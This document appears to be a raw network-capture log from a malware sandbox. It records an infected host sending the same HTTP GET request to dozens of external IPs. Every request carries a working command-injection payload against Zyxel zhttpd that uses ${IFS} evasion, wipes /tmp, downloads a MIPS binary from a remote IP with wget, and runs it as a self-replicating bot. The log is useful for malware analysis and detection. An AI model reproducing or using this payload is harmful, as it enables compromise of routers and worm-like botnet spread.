                              Session IDSource IPSource PortDestination IPDestination Port
                              5811192.168.2.133872473.157.240.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008229017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5812192.168.2.13546782.235.240.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008265018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5813192.168.2.1347974197.45.61.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008308887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5814192.168.2.1341058201.135.187.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008359909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5815192.168.2.135498482.71.248.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008394957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5816192.168.2.1344638217.140.213.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008430958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5817192.168.2.135859672.129.106.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008507967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5818192.168.2.135971069.238.124.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008541107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5819192.168.2.1353606111.54.173.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008589029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5820192.168.2.1337448129.74.55.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008661985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5821192.168.2.1344686124.250.159.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008696079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5822192.168.2.135929854.178.76.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008750916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5823192.168.2.133325040.136.28.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008800030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5824192.168.2.135269469.254.91.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008852005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5825192.168.2.1360736196.24.145.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008907080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5826192.168.2.1357890201.3.148.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008944035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5827192.168.2.133709493.129.165.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.008990049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5828192.168.2.1351838148.242.53.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009037018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5829192.168.2.1357330165.214.151.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009085894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5830192.168.2.1334128160.61.212.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009115934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5831192.168.2.1344812203.147.58.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009155035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5832192.168.2.13544181.0.168.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009208918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5833192.168.2.1345004195.111.173.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009263992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5834192.168.2.136018258.207.79.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009310961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5835192.168.2.1342360103.46.159.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009357929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5836192.168.2.1340422156.98.252.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009418011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5837192.168.2.1336446123.23.241.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009447098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5838192.168.2.1340240217.90.212.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009489059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5839192.168.2.1359704211.97.80.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009550095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5840192.168.2.1347406167.135.57.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009583950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5841192.168.2.134253275.186.52.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009618044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5842192.168.2.135901647.190.15.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009669065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5843192.168.2.134229612.25.130.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009717941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5844192.168.2.1345310219.113.148.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009763956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5845192.168.2.13480522.44.52.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009820938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5846192.168.2.1354080107.253.195.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009891033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5847192.168.2.135049678.121.247.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009922028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5848192.168.2.1351598209.61.87.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.009983063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5849192.168.2.1334600176.241.116.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010026932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5850192.168.2.1348768118.42.99.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010092020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5851192.168.2.135665877.146.118.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010113955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5852192.168.2.135615484.160.104.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010158062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5853192.168.2.1335562181.234.19.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010202885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5854192.168.2.134757625.190.252.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010236979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5855192.168.2.135454017.99.88.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010283947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5856192.168.2.134015089.43.165.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010334969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5857192.168.2.133542297.81.241.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010379076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5858192.168.2.1336372123.205.171.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010453939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5859192.168.2.1342338219.225.253.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010473967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5860192.168.2.1341458157.220.225.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010524988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5861192.168.2.1345020195.134.229.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010564089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5862192.168.2.134147045.145.223.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010615110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5863192.168.2.133808685.97.202.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010680914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5864192.168.2.1334950119.39.156.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010725021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5865192.168.2.1333248165.90.115.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010782957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5866192.168.2.1338442165.12.101.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010812044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5867192.168.2.1359392219.41.114.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010859966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5868192.168.2.1350426175.60.118.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010874033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5869192.168.2.1354816163.254.70.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010898113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5870192.168.2.1357518103.135.153.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010946035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5871192.168.2.134915095.123.220.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.010968924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5872192.168.2.135829217.74.146.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011022091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5873192.168.2.1342642180.90.108.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011080027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5874192.168.2.133351299.57.89.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011113882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5875192.168.2.1336698186.80.47.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011177063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5876192.168.2.133523659.55.29.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011226892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5877192.168.2.136041882.212.2.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011255026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5878192.168.2.133433218.131.196.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011293888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5879192.168.2.133349873.10.169.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011327982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5880192.168.2.1357230157.166.164.215443
                              TimestampBytes transferredDirectionData
